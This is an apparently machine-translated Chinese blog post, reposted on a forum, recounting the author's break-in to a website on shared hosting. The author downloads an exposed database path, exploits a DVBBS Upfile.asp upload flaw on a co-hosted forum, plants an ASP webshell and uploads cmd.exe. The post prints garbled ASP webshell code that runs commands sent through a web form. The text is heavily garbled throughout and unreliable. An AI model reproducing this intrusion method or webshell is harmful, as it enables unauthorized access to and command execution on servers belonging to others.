Safety test of a virtual host of BT for a security setting

xiaoxiao2021-03-06  88

Author: Han Blood Source: www.qfaq.com

I saw a Trojan station a few days ago, and then he had a safety test for him. It was found that it was on a virtual host, and the security settings of the virtual host were relatively high. How did I enter me today? The Trojan station has been written, there is no technical thing designed to design, just say this idea, because of the most important thing! First, I saw the next stop. It was found that the power system, looked at the next version MyPower Ver3.51, which was more new, injected into filtering, and the uploaded place could not pass the ASP Trojan. At the time, it was depressed. I can't blind, directly Enter http://www.*****.com/inc/conn.asp database directly:

Dizzy, so long name! ! ! Now I can give his database down, then go to the MD5 password, but this is too time, not me, etc.! In his stood, it was found that there was nothing to use, so I used WHOIS to check how many stations on his host, http://whois.Webhosting.info/*.*.*, one Look, - IP Hosts 118 Total Domains ... Showing 1 - 50 out of 118 dizzy, how to find, if you find it, don't look at it, your luck is good, find a mobile network forum, DVBBS Version 6.1. 0, look at Upfile.asp, find the existence, the vulnerability of the direct use of the mobile network, the tool is uploaded to an ASP Trojan, and the display is successful, but when it is open, the current directory is discovered, the relevant prompts are prohibited from running the ASP program, " depressed! ! ! It seems that it is not necessary to manually, but the handmade is a ripe road, change the directory into the root directory, it is impossible to run the ASP program! Here I have brought it, unfamiliar friends can go to the breeze to find which animation tutorial! Finally, here is here:

Originally thinking that the next thing will be smooth, then know that all the problems are here! I want to pass an ASP Trojan in the top of Haiyang, but there is such a situation when it is stored.

Which is halo, it seems that the host has information intercepting the system, we are not afraid, I will try again on the ASP web page!

Depressed, the warning information just came out again, and later discussed with a few friends, guess the Asp.dll file on their host to filter the upload of the ASP file, calculated, hard to handle us directly ASP Trojan, but now you have to find a little bit, because it will be very trouble when the Too Trojan caught! I use the exclusive back door of pigs! Final success:

After entering, I found that the host did a security policy. No matter how jumped, I could only look in this directory. Although I knew the actual path of the Trojan station, it was not written in, and the host is not allowed to transfer ASP in Web Program, depressed, ordered can not be implemented, it seems that we have got a WebShell without what! I found an ASP Trojan written by the shark:

<% @ LANGUAGE = "VBScript" cODEpagE = "936"%> <% iF Err thEn%> <% end if%>
"method =" POST ">

Regardless of whether the server is modified The name of WSH can be used.

Make a shark production, I wish you good luck! QQ: 178383587 <% DIM LHTMP ON Error ResMe next lhtmp = server.mappath ("/") lhtmp = lhtmp "/lhtmp.txt" call oscriptlhn.run ("D : / Website / WEB / CMD.EXE / C "& Request.form (" CMD ") &" & lhtmp, 0, true) Set ofile = OfileLH.OpenTextFile (lhtmp, 1, False, 0)%>

 
<% IF (isobject (ofile) Then ON Error Resume Next Response.Write Server.htmlencode (Ofile.Readall) Ofile.Close Call OfileLh.Deletefile (lhtmp, true ) End IF%>

Then I uploaded a cmd.exe from this unit to his directory. I originally wanted to pass a SERV-U overflow tool, but swept the port of his open, I saw it is Microsoft's FTP, which is depressed! Now I can perform a little order, but still can't go to the Trojan station, I suddenly remembered that I didn't know his actual directory, his directory must be written, if you can't write, there is no way. Manage, why not use the copy command to put the ASP Troja Copy here! I even asked for a while, then I executed the next command: Opened and see success:

Wahaha, successful! I didn't say the following things, I have reached the purpose of penetration, but the host authority should be more difficult! I will no longer continue!

转载请注明原文地址:https://www.9cbs.com/read-105827.html

New Post(0)
CopyRight © 2020 All Rights Reserved
Processed: 0.036, SQL: 9